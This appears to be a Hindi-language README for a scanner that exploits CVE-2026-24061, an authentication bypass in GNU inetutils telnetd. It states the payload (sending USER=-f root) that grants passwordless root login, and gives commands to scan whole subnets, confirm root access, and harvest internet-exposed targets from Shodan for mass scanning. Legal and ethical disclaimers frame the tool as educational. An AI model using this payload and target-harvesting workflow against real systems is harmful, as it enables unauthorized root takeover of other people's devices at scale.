
CVE-2026-24061 telnetd प्रमाणीकरण बाईपास के लिए स्कैन करता है, पेलोड उत्पन्न करता है और कमजोर GNU inetutils telnetd उपकरणों पर रूट एक्सेस सत्यापित करता है।
⚠️ बहुत महत्वपूर्ण कानूनी चेतावनी ⚠️
यह टूल केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान, भेद्यता विश्लेषण और अधिकृत परीक्षणों के लिए है।
USER=-f root (या विविधताएं) भेजने से बिना पासवर्ड के तुरंत root के रूप में लॉगिन संभव होता है।यह स्कैनर Hakai Security टीम द्वारा प्रकाशित उत्कृष्ट तकनीकी विश्लेषण और प्रूफ ऑफ कॉन्सेप्ट की बदौलत ही संभव हो सका।
उनके विस्तृत लेख ने शोषण वेक्टर, वास्तविक पेलोड और कमजोर telnetd के व्यवहार के बारे में सटीक तकनीकी आधार प्रदान किए।
→ पूरा विश्लेषण यहां पढ़ें:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Hakai Security को बहुत धन्यवाद पारदर्शिता, तकनीकी गुणवत्ता और सुरक्षा समुदाय में योगदान के लिए। आपने इस टूल को जिम्मेदार अनुसंधान के लिए अधिक सटीक और उपयोगी बनाने में मदद की।
--users के माध्यम से अनुकूलन योग्य उपयोगकर्ता सूची (डिफ़ॉल्ट में root, admin, pi, ubuntu, debian, आदि शामिल हैं)id और whoami के माध्यम से वास्तविक root सत्यापन (--verify)-w के साथ समायोज्य)# अनुशंसित: virtualenv का उपयोग करें
python3 -m venv venv-cve
source venv-cve/bin/activate
# निर्भरताएं स्थापित करें
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# लक्ष्यों की सूची के साथ (उदा: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# root पर केंद्रित (तेज़)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# ड्राई-रन (केवल IP सूचीबद्ध करता है)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# अपनी API Key के साथ आरंभ करें
shodan init SUA_API_KEY_AQUI
# संभावित लक्ष्य डाउनलोड करें
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# IP निकालें
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# स्कैन
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Pull requests का स्वागत है, बशर्ते नैतिक फोकस बनाए रखा जाए और जिम्मेदारी की चेतावनियों को सुदृढ़ किया जाए। लाइसेंस MIT License – लेकिन मैं दोहराता हूं: अनधिकृत उपयोग की पूरी जिम्मेदारी उपयोगकर्ता की है। अध्ययन, जागरूकता और सुरक्षा अनुसंधान के लिए बनाया गया।
⭐ अगर उपयोगी लगा, तो एक स्टार दें!
🛡️ अत्यधिक जिम्मेदारी के साथ उपयोग करें।
Made with ❤️ by killsystema